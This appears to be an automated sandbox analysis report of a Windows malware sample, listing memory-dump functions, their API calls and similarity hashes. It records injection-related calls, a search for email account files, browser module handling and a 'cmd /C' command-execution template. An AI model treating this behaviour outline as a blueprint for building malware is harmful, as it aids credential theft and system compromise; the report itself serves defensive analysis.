APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3464F, Relevance: 6.0, APIs: 4, Instructions: 32 Total matches: 128memorystring
Similarity
  • Total matches: 128
  • API ID: lstrlen$RtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 1738276641-0
  • Opcode ID: aaba7d0a47ca100521561682d36ca88f08b4b9b0e2dd2eccb0d3987922e97ba9
  • Instruction ID: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
  • Opcode Fuzzy Hash: B7C012A4436C87C88CC059470679660D1C55FF6B0001C530BB0542A31D47523AB6758D
  • Instruction Fuzzy Hash: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
APIs
  • lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
  • lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
  • wsprintfW.USER32 ref: 01B3469A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 67745

General

Root Process Name:d3d8sext.exe
Process MD5:9D985C429B23E924BB4D4ED98778EBBA
Total matches:141
Initial Analysis Report:Open
Initial sample Analysis ID:67745
Initial sample SHA 256:FF82DDBE1E173EA08DFE5177913F9AFF88BF3CCC092DFCD2F93AD64AF37810C2
Initial sample name:xxx.exe

Similar Executed Functions

Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
